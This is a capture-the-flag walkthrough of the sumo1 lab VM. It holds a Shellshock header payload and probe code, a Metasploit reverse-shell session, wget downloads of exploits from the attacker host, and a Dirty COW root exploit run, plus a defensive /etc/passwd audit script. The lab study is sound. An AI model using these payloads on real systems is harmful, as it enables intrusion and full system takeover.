Penetration testing practice notes: the sumo1 target VM

For the lab setup, see

https://blog.csdn.net/qq_33163046/article/details/106544200

 

Attacker machine:

10.42.43.56(192.168.56.111)

 

1. Identify the target's IP with arp-scan (of the hosts answering on the host-only network, 192.168.56.138 is the target used in the following steps)

 

root@kali:~# arp-scan -l

Interface: eth0, type: EN10MB, MAC: 08:00:27:6e:5b:79, IPv4: 192.168.56.111

Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.56.1    0a:00:27:00:00:08       (Unknown: locally administered)

192.168.56.100  08:00:27:29:1c:17       PCS Systemtechnik GmbH

192.168.56.100  08:00:27:8b:4b:fa       PCS Systemtechnik GmbH (DUP: 2)

192.168.56.100  08:00:27:40:ba:b0       PCS Systemtechnik GmbH (DUP: 3)

192.168.56.105  08:00:27:92:a6:6c       PCS Systemtechnik GmbH

192.168.56.109  08:00:27:04:dd:ae       PCS Systemtechnik GmbH

192.168.56.138  08:00:27:53:4b:7d       PCS Systemtechnik GmbH

 

7 packets received by filter, 0 packets dropped by kernel

Ending arp-scan 1.9.7: 256 hosts scanned in 1.958 seconds (130.75 hosts/sec). 7 responded

 

2. Scan the web server for vulnerabilities with nikto

root@kali:~# nikto -h http://192.168.56.138

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          192.168.56.138

+ Target Hostname:    192.168.56.138

+ Target Port:        80

+ Start Time:         2020-06-08 23:24:05 (GMT-4)

---------------------------------------------------------------------------

+ Server: Apache/2.2.22 (Ubuntu)

+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ Uncommon header 'tcn' found, with contents: list

+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html

+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.

+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS

+ Uncommon header '93e4r0-cve-2014-6278' found, with contents: true

+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).

+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).

+ OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...

+ OSVDB-3233: /icons/README: Apache default file found.

+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host

+ End Time:           2020-06-08 23:24:23 (GMT-4) (18 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested
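nikto reports two CGI paths as Shellshock candidates. Before handing the finding to Metasploit it is worth confirming it by hand, and seeing how the check actually works: the probe is a request header whose value starts with a bash function definition, which mod_cgi exports to the script as an environment variable (User-Agent becomes HTTP_USER_AGENT), and an unpatched bash executes the commands that follow the function body. The Python below is an added example, not code from the original walkthrough, nikto or Metasploit: it builds that header, checks a response for a random marker, prints the equivalent curl one-liner, and can send the probe against a URL. The marker prefix, the constructed sample responses and all helper names are assumptions of this example.

```python
"""Manual Shellshock (CVE-2014-6271) probe for a CGI endpoint such as /cgi-bin/test.

Added example, not code from the original walkthrough, nikto or Metasploit.
The marker prefix, the sample responses and all helper names are our own.
"""
import secrets
import urllib.error
import urllib.request
from typing import Dict, Optional

MARKER_PREFIX = "ss-"  # assumption: any token unlikely to appear in page content works


def make_marker() -> str:
    """Random token so a hit cannot be confused with ordinary page content."""
    return MARKER_PREFIX + secrets.token_hex(8)


def build_probe_headers(marker: str, header: str = "User-Agent") -> Dict[str, str]:
    """Craft the single request header that carries the payload.

    mod_cgi exports request headers to the CGI process as environment variables
    (User-Agent -> HTTP_USER_AGENT, Referer -> HTTP_REFERER, Cookie -> HTTP_COOKIE).
    An unpatched bash treats a value beginning with '() {' as an exported function
    definition and executes whatever follows the closing brace. The Content-type
    line and the blank 'echo' form a valid CGI header block, so Apache returns the
    marker in the HTTP body instead of failing with a 500.
    """
    payload = "() { :; }; echo Content-type: text/plain; echo; echo %s" % marker
    return {header: payload}


def curl_equivalent(url: str, marker: str, header: str = "User-Agent") -> str:
    """The same probe as a one-liner to paste into a Kali shell."""
    value = build_probe_headers(marker, header)[header]
    return "curl -s -i -H '%s: %s' '%s'" % (header, value, url)


def marker_in_body(body: str, marker: str) -> bool:
    """Only the marker coming back is proof. A bare 500 is inconclusive:
    a CGI script that is merely broken also answers 500."""
    return marker in body


def probe(url: str, header: str = "User-Agent", timeout: float = 5.0) -> Optional[bool]:
    """Send one probe. True = marker echoed (vulnerable), False = not echoed,
    None = could not connect."""
    marker = make_marker()
    req = urllib.request.Request(url, headers=build_probe_headers(marker, header))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return marker_in_body(resp.read().decode("latin-1"), marker)
    except urllib.error.HTTPError as err:
        # Apache still relays whatever the script wrote before it failed.
        return marker_in_body(err.read().decode("latin-1"), marker)
    except (urllib.error.URLError, OSError):
        return None


if __name__ == "__main__":
    # Constructed responses standing in for a live target.
    m = "ss-0123456789abcdef"
    vulnerable_body = m + "\n"
    patched_body = "<html><body><h1>Internal Server Error</h1></body></html>"
    print("vulnerable sample:", marker_in_body(vulnerable_body, m))
    print("patched sample:   ", marker_in_body(patched_body, m))
    print(curl_equivalent("http://192.168.56.138/cgi-bin/test", m))
```

Run probe() against each path nikto listed, and against more than one header: some CGI wrappers only pass a subset of headers through, so a negative on User-Agent alone is not a clean bill of health.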

 

3. Find the Metasploit module for this vulnerability and use it (TARGETURI is set to the /cgi-bin/test path nikto flagged)

msf5 > search 2014-6271

 

Matching Modules

================

 

   #  Name                                               Disclosure Date  Rank       Check  Description

   -  ----                                               ---------------  ----       -----  -----------

   0  auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

   1  auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)

   2  exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)

   3  exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)

   4  exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

   5  exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)

   6  exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)

   7  exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)

   8  exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)

   9  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)

 

msf5 > use exploit/multi/http/apache_mod_cgi_bash_env_exec

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) >

 

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 192.168.56.138

RHOSTS => 192.168.56.138

 

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/test

TARGETURI => /cgi-bin/test

msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit                 

[*] Started reverse TCP handler on 192.168.56.111:4444

[*] Command Stager progress - 100.46% done (1097/1092 bytes)

[*] Sending stage (985320 bytes) to 192.168.56.138

[*] Meterpreter session 1 opened (192.168.56.111:4444 -> 192.168.56.138:56657) at 2020-06-08 23:34:53 -0400

 

meterpreter > shell

Process 885 created.

Channel 1 created.

python -c 'import pty; pty.spawn("/bin/bash")'

www-data@ubuntu:/usr/lib/cgi-bin$

 

4. Download the Dirty COW (CVE-2016-5195) exploit code onto Kali

Fetch the Dirty COW check script dirtycowscan.sh and the exploit dirty.c:

https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh

https://www.exploit-db.com/raw/40839

root@kali:/sumo# ls -l

total 44

-rwxr-xr-x 1 root root  5006 Jun  8 23:45 dirty.c

-rwxr-xr-x 1 root root 36036 Jun  8 23:45 dirtycowscan.sh

 

5. Start a local HTTP server on Kali to stage the files (python -m SimpleHTTPServer is the Python 2 form; on Python 3 the equivalent is python3 -m http.server)

root@kali:/sumo# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

 


6. Transfer and run dirtycowscan.sh

www-data@ubuntu:/tmp$ ls

ls

CVhNb  SUmli

www-data@ubuntu:/tmp$ wget http://192.168.56.111:8000/dirtycowscan.sh

wget http://192.168.56.111:8000/dirtycowscan.sh

--2020-06-16 00:53:11--  http://192.168.56.111:8000/dirtycowscan.sh

Connecting to 192.168.56.111:8000... connected.

HTTP request sent, awaiting response... 200 OK

Length: 36036 (35K) [text/x-sh]

Saving to: `dirtycowscan.sh'

 

100%[======================================>] 36,036      --.-K/s   in 0s

 

2020-06-16 00:53:11 (275 MB/s) - `dirtycowscan.sh' saved [36036/36036]

 

www-data@ubuntu:/tmp$ ls

ls

CVhNb  SUmli  dirtycowscan.sh

www-data@ubuntu:/tmp$ chmod 777 dirtycowscan.sh

chmod 777 dirtycowscan.sh

www-data@ubuntu:/tmp$ ls -l

ls -l

total 44

-rwxrwxrwx 1 www-data www-data   207 Jun 16 00:49 CVhNb

-rwxrwxrwx 1 www-data www-data   207 Jun 16 00:34 SUmli

-rwxrwxrwx 1 www-data www-data 36036 Jun  8 21:57 dirtycowscan.sh

www-data@ubuntu:/tmp$ ./dirtycowscan.sh

./dirtycowscan.sh

Your kernel is 3.2.0-23-generic which IS vulnerable.

It is recommends that you update your kernel. Alternatively, you can apply partial

mitigation described at https://access.redhat.com/security/vulnerabilities/2706661 .

 

7. Transfer, compile and run dirty.c (this works because the target has gcc installed; otherwise the exploit has to be compiled elsewhere against a compatible libc and the binary transferred instead)

www-data@ubuntu:/tmp$ wget http://192.168.56.111:8000/dirty.c

wget http://192.168.56.111:8000/dirty.c

--2020-06-16 01:01:44--  http://192.168.56.111:8000/dirty.c

Connecting to 192.168.56.111:8000... connected.

HTTP request sent, awaiting response... 200 OK

Length: 4814 (4.7K) [text/plain]

Saving to: `dirty.c'

 

100%[======================================>] 4,814       --.-K/s   in 0.02s

 

2020-06-16 01:01:44 (231 KB/s) - `dirty.c' saved [4814/4814]

 

 

www-data@ubuntu:/tmp$ chmod 777 dirty.c

chmod 777 dirty.c

www-data@ubuntu:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt

gcc -pthread dirty.c -o dirty -lcrypt

www-data@ubuntu:/tmp$ ./dirty testpasswd

./dirty testpasswd

/etc/passwd successfully backed up to /tmp/passwd.bak

Please enter the new password: testpasswd

Complete line:

firefart:fieLQox9gttqw:0:0:pwned:/root:/bin/bash

 

mmap: 7f1d3b876000

madvise 0

 

ptrace 0

Done! Check /etc/passwd to see if the new user was created.

You can log in with the username 'firefart' and the password 'testpasswd'.

 

 

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd


 

8. Log in as the newly created user and read the flag

www-data@ubuntu:/tmp$ su firefart

su  firefart

Password: testpasswd

 

firefart@ubuntu:/tmp#

 

firefart@ubuntu:/tmp# cd /root

cd /root

firefart@ubuntu:~# cat root.txt

cat root.txt

{Sum0-SunCSR-2020_r001}
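The line the exploit reports ("Complete line: firefart:fieLQox9gttqw:0:0:pwned:/root:/bin/bash") is also the artifact a defender looks for afterwards: a second uid-0 account whose password hash sits in /etc/passwd rather than /etc/shadow. The Python below is an added example, not part of the original writeup or of dirty.c. It parses passwd-format text, flags those two indicators plus a vanished root entry (in case the exploit's write clobbered the original first line), and diffs the live file against the /tmp/passwd.bak backup the exploit tells you to restore. The sample passwd content (root, daemon and www-data plus the firefart line) is constructed, the helper names are ours, and it assumes a shadow-password system such as Ubuntu, where every passwd password field is 'x'.

```python
"""Audit /etc/passwd for the artifact left by the Dirty COW passwd exploit (dirty.c).

Added example, not code from the original walkthrough or from dirty.c.
The sample passwd content is constructed; the helper names are ours.
Assumes a shadow-password system (Ubuntu), where every password field is 'x'.
"""
import sys
from dataclasses import dataclass
from typing import List


@dataclass
class PasswdEntry:
    name: str
    password: str  # 'x' on a shadow system; anything else is stored right here
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


# Constructed sample: a minimal pre-exploit file ...
SAMPLE_BACKUP = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    "www-data:x:33:33:www-data:/var/www:/bin/sh\n"
)
# ... and the same file with the line dirty.c printed appended to it.
FIREFART_LINE = "firefart:fieLQox9gttqw:0:0:pwned:/root:/bin/bash"
SAMPLE_CURRENT = SAMPLE_BACKUP + FIREFART_LINE + "\n"


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd-format text. A line without exactly 7 fields is rejected:
    a partly overwritten entry is itself a sign something wrote into the file."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 fields, got %d" % (lineno, len(fields)))
        name, password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell))
    return entries


def find_suspicious(entries: List[PasswdEntry]) -> List[str]:
    """Human-readable findings: missing root, extra uid-0 accounts, and
    password material kept in passwd instead of shadow."""
    findings = []
    if not any(e.name == "root" for e in entries):
        findings.append("no 'root' entry")
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append("uid 0 account '%s' (home %s, shell %s)" % (e.name, e.home, e.shell))
        if e.password != "x":
            findings.append("'%s' keeps its password field in /etc/passwd: %r" % (e.name, e.password))
    return findings


def added_lines(backup: str, current: str) -> List[str]:
    """Lines in the live file that the backup (/tmp/passwd.bak) does not have."""
    return sorted(set(current.splitlines()) - set(backup.splitlines()))


if __name__ == "__main__":
    # Usage: python passwd_audit.py /tmp/passwd.bak /etc/passwd ; no args runs the sample.
    if len(sys.argv) == 3:
        backup, current = (open(p).read() for p in sys.argv[1:3])
    else:
        backup, current = SAMPLE_BACKUP, SAMPLE_CURRENT
    for finding in find_suspicious(parse_passwd(current)) or ["nothing suspicious"]:
        print(finding)
    for line in added_lines(backup, current):
        print("not in backup:", line)
```

On the target itself, running the audit against /tmp/passwd.bak and /etc/passwd before and after the restore command the exploit prints is the quickest way to confirm the cleanup actually happened.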
